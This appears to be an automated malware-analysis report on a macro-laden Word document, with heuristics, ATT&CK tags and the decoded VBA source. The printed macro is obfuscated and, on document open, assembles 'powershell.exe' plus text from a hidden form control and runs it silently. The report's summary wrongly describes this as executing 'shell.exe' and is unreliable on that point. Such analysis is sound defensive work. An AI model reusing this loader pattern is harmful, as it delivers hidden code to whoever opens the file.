MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro triggers a call to the 'Shell()' function, which is used to execute 'shell.exe'. This indicates the document is designed to download and execute a secondary payload. The specific payload and its ultimate destination are not directly extractable from the provided evidence, leading to an 'unknown family' classification.
Heuristics 5
-
ClamAV: Doc.Malware.00536d-6846280-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6846280-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2044 bytes |
SHA-256: ddb281a14a5d25f14f960f270dfef6ba46d065338d1bc3fe100145450bd16bb4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim MxyFfgs As Long
MxyFfgs = (-906 + 925) / (41)
Dim rjlgmK51(232) As Byte
Dim q3pkR(8 To 117) As String
q3pkR(8) = "RTaF3r"
Dim AG2gpH() As Byte
Dim UkHzL() As Byte
Dim LR1UWfp(136) As Byte
Dim CU9my3NYc(43) As Byte
Dim hqVah(3 To 162) As String
hqVah(3) = "fc8NVH"
Dim kVwEy7(3 To 162) As String
kVwEy7(3) = "NBnr4jZPO"
Call w("er")
End Sub
Attribute VB_Name = "kdyTmE"
Sub w(YHtYopdwI)
Dim kuOLHXAx
kuOLHXAx = MYK5w798
Dim E2O8VgT() As Byte
Dim sxyLQGm(16 To 33) As String
sxyLQGm(16) = "HO1FhQG"
Dim INm4wad(113) As Byte
AC72JMfqa = "shell.exe "
Dim cDOs4(14 To 189) As String
cDOs4(14) = "LPBLQt"
Dim RNI2Vi As String
RNI2Vi = a6vZFs7Ny
Dim X4ZeUACo0 As Long
X4ZeUACo0 = (-171 + 186) - (6)
Shell X4FU5LHdW() _
& YHtYopdwI _
& AC72JMfqa _
& lKHBiCgT _
, 0
Dim YHRIOp(10 To 185) As Long
YHRIOp(10) = 7524 / 36
Dim pMais(10 To 185) As Long
pMais(10) = 7524 / 36
End Sub
Attribute VB_Name = "gISHXOu0y"
Public Function X4FU5LHdW() As String
Dim cEhi6(158) As Byte
Dim mF1YLecm7 As Long
mF1YLecm7 = (19330 / 3866) / (39)
X4FU5LHdW = "pow"
End Function
Attribute VB_Name = "Q9tnxf0r"
Public Function lKHBiCgT()
Dim PMmndp As Object
Dim NJ8Aq7H As Long
NJ8Aq7H = (-1353 + 1366) + (23)
Set PMmndp = New f
Dim IvexNjB1 As String
Dim lPQGbH(13 To 224) As String
lPQGbH(13) = "SvhNW"
IvexNjB1 = PMmndp.de.Text
lKHBiCgT = IvexNjB1
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{899A512C-70BB-4440-B8DD-7AC18CB4FE59}{20E8BC88-B014-46ED-9A49-579A83AFBE12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.